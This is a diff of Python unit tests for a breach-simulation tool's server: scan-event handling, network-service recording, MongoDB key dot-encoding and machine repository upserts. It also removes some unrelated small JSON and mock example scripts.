||||||
|
|
||||||
|
SOURCE_MACHINE_ID = 1
|
||||||
|
SOURCE_MACHINE = Machine(
|
||||||
|
id=SOURCE_MACHINE_ID,
|
||||||
|
hardware_id=5,
|
||||||
|
network_interfaces=[IPv4Interface(IP_ADDRESS)],
|
||||||
|
)
|
||||||
|
|
||||||
|
SOURCE_AGENT_ID = UUID("655fd01c-5eec-4e42-b6e3-1fb738c2978d")
|
||||||
|
SOURCE_AGENT = Agent(
|
||||||
|
id=SOURCE_AGENT_ID,
|
||||||
|
machine_id=SOURCE_MACHINE_ID,
|
||||||
|
start_time=0,
|
||||||
|
parent_id=None,
|
||||||
|
cc_server=(SocketAddress(ip="10.10.10.10", port=5000)),
|
||||||
|
)
|
||||||
|
|
||||||
|
EXPECTED_CREATED_MACHINE = Machine(
|
||||||
|
id=SEED_ID,
|
||||||
|
network_interfaces=[IPv4Interface(IP_ADDRESS)],
|
||||||
|
)
|
||||||
|
|
||||||
|
TEST_EVENT = TestEvent(source=SOURCE_AGENT_ID, success=True)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def agent_repository() -> IAgentRepository:
|
||||||
|
def get_agent_by_id(agent_id: AgentID) -> Agent:
|
||||||
|
if agent_id == SOURCE_AGENT_ID:
|
||||||
|
return SOURCE_AGENT
|
||||||
|
|
||||||
|
raise UnknownRecordError()
|
||||||
|
|
||||||
|
agent_repository = MagicMock(spec=IAgentRepository)
|
||||||
|
agent_repository.get_agent_by_id = MagicMock(side_effect=get_agent_by_id)
|
||||||
|
return agent_repository
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def machine_repository() -> IMachineRepository:
|
||||||
|
def get_machine_by_id(machine_id: MachineID) -> Machine:
|
||||||
|
if machine_id == SOURCE_MACHINE_ID:
|
||||||
|
return SOURCE_MACHINE
|
||||||
|
|
||||||
|
raise UnknownRecordError()
|
||||||
|
|
||||||
|
machine_repository = MagicMock(spec=IMachineRepository)
|
||||||
|
machine_repository.get_new_id = MagicMock(return_value=SEED_ID)
|
||||||
|
machine_repository.get_machine_by_id = MagicMock(side_effect=get_machine_by_id)
|
||||||
|
return machine_repository
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture
|
||||||
|
def node_update_facade(
|
||||||
|
agent_repository: IAgentRepository, machine_repository: IMachineRepository
|
||||||
|
) -> NodeUpdateFacade:
|
||||||
|
return NodeUpdateFacade(agent_repository, machine_repository)
|
||||||
|
|
||||||
|
|
||||||
|
def test_return_existing_machine(node_update_facade, machine_repository):
|
||||||
|
machine_repository.get_machines_by_ip = MagicMock(return_value=[SOURCE_MACHINE])
|
||||||
|
|
||||||
|
target_machine = node_update_facade.get_or_create_target_machine(IP_ADDRESS)
|
||||||
|
|
||||||
|
assert target_machine == SOURCE_MACHINE
|
||||||
|
|
||||||
|
|
||||||
|
def test_create_new_machine(node_update_facade, machine_repository):
|
||||||
|
machine_repository.get_machines_by_ip = MagicMock(side_effect=UnknownRecordError)
|
||||||
|
|
||||||
|
target_machine = node_update_facade.get_or_create_target_machine(IP_ADDRESS)
|
||||||
|
|
||||||
|
assert target_machine == EXPECTED_CREATED_MACHINE
|
||||||
|
assert machine_repository.upsert_machine.called_once_with(target_machine)
|
||||||
|
|
||||||
|
|
||||||
|
def test_get_event_source_machine(node_update_facade):
|
||||||
|
assert node_update_facade.get_event_source_machine(TEST_EVENT) == SOURCE_MACHINE
|
|
@ -8,7 +8,7 @@ import pytest
|
||||||
|
|
||||||
from common import OperatingSystem
|
from common import OperatingSystem
|
||||||
from common.agent_events import PingScanEvent, TCPScanEvent
|
from common.agent_events import PingScanEvent, TCPScanEvent
|
||||||
from common.types import PortStatus, SocketAddress
|
from common.types import NetworkService, PortStatus, SocketAddress
|
||||||
from monkey_island.cc.agent_event_handlers import ScanEventHandler
|
from monkey_island.cc.agent_event_handlers import ScanEventHandler
|
||||||
from monkey_island.cc.models import Agent, CommunicationType, Machine, Node
|
from monkey_island.cc.models import Agent, CommunicationType, Machine, Node
|
||||||
from monkey_island.cc.repository import (
|
from monkey_island.cc.repository import (
|
||||||
|
@ -22,11 +22,13 @@ from monkey_island.cc.repository import (
|
||||||
|
|
||||||
SEED_ID = 99
|
SEED_ID = 99
|
||||||
AGENT_ID = UUID("1d8ce743-a0f4-45c5-96af-91106529d3e2")
|
AGENT_ID = UUID("1d8ce743-a0f4-45c5-96af-91106529d3e2")
|
||||||
MACHINE_ID = 11
|
SOURCE_MACHINE_ID = 11
|
||||||
CC_SERVER = SocketAddress(ip="10.10.10.100", port="5000")
|
CC_SERVER = SocketAddress(ip="10.10.10.100", port="5000")
|
||||||
AGENT = Agent(id=AGENT_ID, machine_id=MACHINE_ID, start_time=0, parent_id=None, cc_server=CC_SERVER)
|
AGENT = Agent(
|
||||||
|
id=AGENT_ID, machine_id=SOURCE_MACHINE_ID, start_time=0, parent_id=None, cc_server=CC_SERVER
|
||||||
|
)
|
||||||
SOURCE_MACHINE = Machine(
|
SOURCE_MACHINE = Machine(
|
||||||
id=MACHINE_ID,
|
id=SOURCE_MACHINE_ID,
|
||||||
hardware_id=5,
|
hardware_id=5,
|
||||||
network_interfaces=[IPv4Interface("10.10.10.99/24")],
|
network_interfaces=[IPv4Interface("10.10.10.99/24")],
|
||||||
)
|
)
|
||||||
|
@ -74,6 +76,11 @@ TCP_SCAN_EVENT = TCPScanEvent(
|
||||||
ports={22: PortStatus.OPEN, 80: PortStatus.OPEN, 8080: PortStatus.CLOSED},
|
ports={22: PortStatus.OPEN, 80: PortStatus.OPEN, 8080: PortStatus.CLOSED},
|
||||||
)
|
)
|
||||||
|
|
||||||
|
EXPECTED_NETWORK_SERVICES = {
|
||||||
|
SocketAddress(ip=TARGET_MACHINE_IP, port=22): NetworkService.UNKNOWN,
|
||||||
|
SocketAddress(ip=TARGET_MACHINE_IP, port=80): NetworkService.UNKNOWN,
|
||||||
|
}
|
||||||
|
|
||||||
TCP_CONNECTIONS = {
|
TCP_CONNECTIONS = {
|
||||||
TARGET_MACHINE_ID: (
|
TARGET_MACHINE_ID: (
|
||||||
SocketAddress(ip=TARGET_MACHINE_IP, port=22),
|
SocketAddress(ip=TARGET_MACHINE_IP, port=22),
|
||||||
|
@ -120,7 +127,7 @@ def scan_event_handler(agent_repository, machine_repository, node_repository):
|
||||||
return ScanEventHandler(agent_repository, machine_repository, node_repository)
|
return ScanEventHandler(agent_repository, machine_repository, node_repository)
|
||||||
|
|
||||||
|
|
||||||
MACHINES_BY_ID = {MACHINE_ID: SOURCE_MACHINE, TARGET_MACHINE.id: TARGET_MACHINE}
|
MACHINES_BY_ID = {SOURCE_MACHINE_ID: SOURCE_MACHINE, TARGET_MACHINE.id: TARGET_MACHINE}
|
||||||
MACHINES_BY_IP = {
|
MACHINES_BY_IP = {
|
||||||
IPv4Address("10.10.10.99"): [SOURCE_MACHINE],
|
IPv4Address("10.10.10.99"): [SOURCE_MACHINE],
|
||||||
IPv4Address(TARGET_MACHINE_IP): [TARGET_MACHINE],
|
IPv4Address(TARGET_MACHINE_IP): [TARGET_MACHINE],
|
||||||
|
@ -225,14 +232,14 @@ def test_handle_tcp_scan_event__ports_found(
|
||||||
scan_event_handler.handle_tcp_scan_event(event)
|
scan_event_handler.handle_tcp_scan_event(event)
|
||||||
|
|
||||||
call_args = node_repository.upsert_tcp_connections.call_args[0]
|
call_args = node_repository.upsert_tcp_connections.call_args[0]
|
||||||
assert call_args[0] == MACHINE_ID
|
assert call_args[0] == SOURCE_MACHINE_ID
|
||||||
assert TARGET_MACHINE_ID in call_args[1]
|
assert TARGET_MACHINE_ID in call_args[1]
|
||||||
open_socket_addresses = call_args[1][TARGET_MACHINE_ID]
|
open_socket_addresses = call_args[1][TARGET_MACHINE_ID]
|
||||||
assert set(open_socket_addresses) == set(TCP_CONNECTIONS[TARGET_MACHINE_ID])
|
assert set(open_socket_addresses) == set(TCP_CONNECTIONS[TARGET_MACHINE_ID])
|
||||||
assert len(open_socket_addresses) == len(TCP_CONNECTIONS[TARGET_MACHINE_ID])
|
assert len(open_socket_addresses) == len(TCP_CONNECTIONS[TARGET_MACHINE_ID])
|
||||||
|
|
||||||
|
|
||||||
def test_handle_tcp_scan_event__no_source(
|
def test_handle_tcp_scan_event__no_source_node(
|
||||||
caplog, scan_event_handler, machine_repository, node_repository
|
caplog, scan_event_handler, machine_repository, node_repository
|
||||||
):
|
):
|
||||||
event = TCP_SCAN_EVENT
|
event = TCP_SCAN_EVENT
|
||||||
|
@ -240,8 +247,11 @@ def test_handle_tcp_scan_event__no_source(
|
||||||
scan_event_handler._update_nodes = MagicMock()
|
scan_event_handler._update_nodes = MagicMock()
|
||||||
|
|
||||||
scan_event_handler.handle_tcp_scan_event(event)
|
scan_event_handler.handle_tcp_scan_event(event)
|
||||||
assert "ERROR" in caplog.text
|
expected_node = Node(machine_id=SOURCE_MACHINE_ID)
|
||||||
assert "no source" in caplog.text
|
node_called = node_repository.upsert_node.call_args[0][0]
|
||||||
|
assert expected_node.machine_id == node_called.machine_id
|
||||||
|
assert expected_node.connections == node_called.connections
|
||||||
|
assert expected_node.tcp_connections == node_called.tcp_connections
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize(
|
@pytest.mark.parametrize(
|
||||||
|
@ -382,3 +392,11 @@ def test_failed_scan(
|
||||||
|
|
||||||
assert not node_repository.upsert_communication.called
|
assert not node_repository.upsert_communication.called
|
||||||
assert not machine_repository.upsert_machine.called
|
assert not machine_repository.upsert_machine.called
|
||||||
|
|
||||||
|
|
||||||
|
def test_network_services_handling(scan_event_handler, machine_repository):
|
||||||
|
scan_event_handler.handle_tcp_scan_event(TCP_SCAN_EVENT)
|
||||||
|
|
||||||
|
machine_repository.upsert_network_services.assert_called_with(
|
||||||
|
TARGET_MACHINE_ID, EXPECTED_NETWORK_SERVICES
|
||||||
|
)
|
||||||
|
|
|
@ -0,0 +1,40 @@
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from monkey_island.cc.repository import StorageError
|
||||||
|
from monkey_island.cc.repository.utils import DOT_REPLACEMENT, mongo_dot_decoder, mongo_dot_encoder
|
||||||
|
|
||||||
|
DATASET = [
|
||||||
|
({"no:changes;expectes": "Nothing'$ changed"}, {"no:changes;expectes": "Nothing'$ changed"}),
|
||||||
|
(
|
||||||
|
{"192.168.56.1": "monkeys-running-wild.com"},
|
||||||
|
{
|
||||||
|
f"192{DOT_REPLACEMENT}168{DOT_REPLACEMENT}56{DOT_REPLACEMENT}1": f"monkeys-running-wild{DOT_REPLACEMENT}com"
|
||||||
|
},
|
||||||
|
),
|
||||||
|
(
|
||||||
|
{"...dots...": ",comma,comma,,comedy"},
|
||||||
|
{
|
||||||
|
f"{DOT_REPLACEMENT}{DOT_REPLACEMENT}{DOT_REPLACEMENT}dots"
|
||||||
|
f"{DOT_REPLACEMENT}{DOT_REPLACEMENT}{DOT_REPLACEMENT}": ",comma,comma,,comedy"
|
||||||
|
},
|
||||||
|
),
|
||||||
|
(
|
||||||
|
{"one": {"two": {"three": "this.is.nested"}}},
|
||||||
|
{"one": {"two": {"three": f"this{DOT_REPLACEMENT}is{DOT_REPLACEMENT}nested"}}},
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
|
# This dict already contains the replacement used, encoding procedure would lose data
|
||||||
|
FLAWED_DICT = {"one": {".two": {"three": f"this is with {DOT_REPLACEMENT} already!!!!"}}}
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("input, expected_output", DATASET)
|
||||||
|
def test_mongo_dot_encoding_and_decoding(input, expected_output):
|
||||||
|
encoded = mongo_dot_encoder(input)
|
||||||
|
assert encoded == expected_output
|
||||||
|
assert mongo_dot_decoder(encoded) == input
|
||||||
|
|
||||||
|
|
||||||
|
def test_mongo_dot_encoding__data_loss():
|
||||||
|
with pytest.raises(StorageError):
|
||||||
|
mongo_dot_encoder(FLAWED_DICT)
|
|
@ -6,6 +6,7 @@ import mongomock
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
from common import OperatingSystem
|
from common import OperatingSystem
|
||||||
|
from common.types import NetworkService, SocketAddress
|
||||||
from monkey_island.cc.models import Machine
|
from monkey_island.cc.models import Machine
|
||||||
from monkey_island.cc.repository import (
|
from monkey_island.cc.repository import (
|
||||||
IMachineRepository,
|
IMachineRepository,
|
||||||
|
@ -15,6 +16,7 @@ from monkey_island.cc.repository import (
|
||||||
StorageError,
|
StorageError,
|
||||||
UnknownRecordError,
|
UnknownRecordError,
|
||||||
)
|
)
|
||||||
|
from monkey_island.cc.repository.utils import mongo_dot_encoder
|
||||||
|
|
||||||
MACHINES = (
|
MACHINES = (
|
||||||
Machine(
|
Machine(
|
||||||
|
@ -32,6 +34,10 @@ MACHINES = (
|
||||||
operating_system=OperatingSystem.WINDOWS,
|
operating_system=OperatingSystem.WINDOWS,
|
||||||
operating_system_version="eXtra Problems",
|
operating_system_version="eXtra Problems",
|
||||||
hostname="hal",
|
hostname="hal",
|
||||||
|
network_services={
|
||||||
|
SocketAddress(ip="192.168.1.11", port=80): NetworkService.UNKNOWN,
|
||||||
|
SocketAddress(ip="192.168.1.12", port=80): NetworkService.UNKNOWN,
|
||||||
|
},
|
||||||
),
|
),
|
||||||
Machine(
|
Machine(
|
||||||
id=3,
|
id=3,
|
||||||
|
@ -40,6 +46,10 @@ MACHINES = (
|
||||||
operating_system=OperatingSystem.WINDOWS,
|
operating_system=OperatingSystem.WINDOWS,
|
||||||
operating_system_version="Vista",
|
operating_system_version="Vista",
|
||||||
hostname="smith",
|
hostname="smith",
|
||||||
|
network_services={
|
||||||
|
SocketAddress(ip="192.168.1.11", port=80): NetworkService.UNKNOWN,
|
||||||
|
SocketAddress(ip="192.168.1.11", port=22): NetworkService.UNKNOWN,
|
||||||
|
},
|
||||||
),
|
),
|
||||||
Machine(
|
Machine(
|
||||||
id=4,
|
id=4,
|
||||||
|
@ -51,11 +61,24 @@ MACHINES = (
|
||||||
),
|
),
|
||||||
)
|
)
|
||||||
|
|
||||||
|
SERVICES_TO_ADD = {
|
||||||
|
SocketAddress(ip="192.168.1.11", port=80): NetworkService.UNKNOWN,
|
||||||
|
SocketAddress(ip="192.168.1.11", port=22): NetworkService.UNKNOWN,
|
||||||
|
}
|
||||||
|
|
||||||
|
EXPECTED_SERVICES_1 = EXPECTED_SERVICES_3 = SERVICES_TO_ADD
|
||||||
|
EXPECTED_SERVICES_2 = {
|
||||||
|
**SERVICES_TO_ADD,
|
||||||
|
SocketAddress(ip="192.168.1.12", port=80): NetworkService.UNKNOWN,
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def mongo_client() -> mongomock.MongoClient:
|
def mongo_client() -> mongomock.MongoClient:
|
||||||
client = mongomock.MongoClient()
|
client = mongomock.MongoClient()
|
||||||
client.monkey_island.machines.insert_many((m.dict(simplify=True) for m in MACHINES))
|
client.monkey_island.machines.insert_many(
|
||||||
|
(mongo_dot_encoder(m.dict(simplify=True)) for m in MACHINES)
|
||||||
|
)
|
||||||
return client
|
return client
|
||||||
|
|
||||||
|
|
||||||
|
@ -146,21 +169,6 @@ def test_upsert_machine__storage_error_exception(error_raising_machine_repositor
|
||||||
error_raising_machine_repository.upsert_machine(machine)
|
error_raising_machine_repository.upsert_machine(machine)
|
||||||
|
|
||||||
|
|
||||||
def test_upsert_machine__storage_error_update_failed(error_raising_mock_mongo_client):
|
|
||||||
mock_result = MagicMock()
|
|
||||||
mock_result.matched_count = 1
|
|
||||||
mock_result.modified_count = 0
|
|
||||||
|
|
||||||
error_raising_mock_mongo_client.monkey_island.machines.replace_one = MagicMock(
|
|
||||||
return_value=mock_result
|
|
||||||
)
|
|
||||||
machine_repository = MongoMachineRepository(error_raising_mock_mongo_client)
|
|
||||||
|
|
||||||
machine = MACHINES[0]
|
|
||||||
with pytest.raises(StorageError):
|
|
||||||
machine_repository.upsert_machine(machine)
|
|
||||||
|
|
||||||
|
|
||||||
def test_upsert_machine__storage_error_insert_failed(error_raising_mock_mongo_client):
|
def test_upsert_machine__storage_error_insert_failed(error_raising_mock_mongo_client):
|
||||||
mock_result = MagicMock()
|
mock_result = MagicMock()
|
||||||
mock_result.matched_count = 0
|
mock_result.matched_count = 0
|
||||||
|
@ -279,3 +287,27 @@ def test_usable_after_reset(machine_repository):
|
||||||
def test_reset__removal_error(error_raising_machine_repository):
|
def test_reset__removal_error(error_raising_machine_repository):
|
||||||
with pytest.raises(RemovalError):
|
with pytest.raises(RemovalError):
|
||||||
error_raising_machine_repository.reset()
|
error_raising_machine_repository.reset()
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize(
|
||||||
|
"machine_id, expected_services",
|
||||||
|
[
|
||||||
|
(MACHINES[0].id, EXPECTED_SERVICES_1),
|
||||||
|
(MACHINES[1].id, EXPECTED_SERVICES_2),
|
||||||
|
(MACHINES[2].id, EXPECTED_SERVICES_3),
|
||||||
|
],
|
||||||
|
)
|
||||||
|
def test_service_upsert(machine_id, expected_services, machine_repository):
|
||||||
|
machine_repository.upsert_network_services(machine_id, SERVICES_TO_ADD)
|
||||||
|
assert machine_repository.get_machine_by_id(machine_id).network_services == expected_services
|
||||||
|
|
||||||
|
|
||||||
|
def test_service_upsert__machine_not_found(machine_repository):
|
||||||
|
with pytest.raises(UnknownRecordError):
|
||||||
|
machine_repository.upsert_network_services(machine_id=999, services=SERVICES_TO_ADD)
|
||||||
|
|
||||||
|
|
||||||
|
def test_service_upsert__error_on_storage(machine_repository):
|
||||||
|
malformed_services = 3
|
||||||
|
with pytest.raises(StorageError):
|
||||||
|
machine_repository.upsert_network_services(MACHINES[0].id, malformed_services)
|
||||||
|
|
13
test_dumps
13
test_dumps
|
@ -1,13 +0,0 @@
|
||||||
import json
|
|
||||||
data = {
|
|
||||||
'name' : 'myname',
|
|
||||||
'age' : 100,
|
|
||||||
}
|
|
||||||
# separators:是分隔符的意思,参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符,把:和,后面的空格都除去了.
|
|
||||||
# dumps 将python对象字典转换为json字符串
|
|
||||||
json_str = json.dumps(data, separators=(',', ':'))
|
|
||||||
print(type(json_str), json_str)
|
|
||||||
|
|
||||||
# loads 将json字符串转化为python对象字典
|
|
||||||
pyton_obj = json.loads(json_str)
|
|
||||||
print(type(pyton_obj), pyton_obj)
|
|
|
@ -1,13 +0,0 @@
|
||||||
import json
|
|
||||||
data = {
|
|
||||||
'name' : 'myname',
|
|
||||||
'age' : 100,
|
|
||||||
}
|
|
||||||
# separators:是分隔符的意思,参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符,把:和,后面的空格都除去了.
|
|
||||||
# dumps 将python对象字典转换为json字符串
|
|
||||||
json_str = json.dumps(data, separators=(',', ':'))
|
|
||||||
print(type(json_str), json_str)
|
|
||||||
|
|
||||||
# loads 将json字符串转化为python对象字典
|
|
||||||
pyton_obj = json.loads(json_str)
|
|
||||||
print(type(pyton_obj), pyton_obj)
|
|
|
@ -1,21 +0,0 @@
|
||||||
import unittest
|
|
||||||
from mock import Mock
|
|
||||||
|
|
||||||
|
|
||||||
def VerifyPhone():
|
|
||||||
'''
|
|
||||||
校验用户手机号
|
|
||||||
'''
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
class TestVerifyPhone(unittest.TestCase):
|
|
||||||
|
|
||||||
def test_verify_phone(self):
|
|
||||||
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
|
|
||||||
VerifyPhone = Mock(return_value=data)
|
|
||||||
self.assertEqual("success", VerifyPhone()["msg"]["result"])
|
|
||||||
print('测试用例')
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
unittest.main(verbosity=2)
|
|
|
@ -1,21 +0,0 @@
|
||||||
import unittest
|
|
||||||
from mock import Mock
|
|
||||||
|
|
||||||
|
|
||||||
def VerifyPhone():
|
|
||||||
'''
|
|
||||||
校验用户手机号
|
|
||||||
'''
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
class TestVerifyPhone(unittest.TestCase):
|
|
||||||
|
|
||||||
def test_verify_phone(self):
|
|
||||||
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
|
|
||||||
VerifyPhone = Mock(return_value=data)
|
|
||||||
self.assertEqual("success", VerifyPhone()["msg"]["result"])
|
|
||||||
print('测试用例')
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
unittest.main(verbosity=2)
|
|
|
@ -1,21 +0,0 @@
|
||||||
import unittest
|
|
||||||
from mock import Mock
|
|
||||||
|
|
||||||
|
|
||||||
def VerifyPhone():
|
|
||||||
'''
|
|
||||||
校验用户手机号
|
|
||||||
'''
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
class TestVerifyPhone(unittest.TestCase):
|
|
||||||
|
|
||||||
def test_verify_phone(self):
|
|
||||||
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
|
|
||||||
VerifyPhone = Mock(return_value=data)
|
|
||||||
self.assertEqual("success", VerifyPhone()["msg"]["result"])
|
|
||||||
print('测试用例')
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
unittest.main(verbosity=2)
|
|
Loading…
Reference in New Issue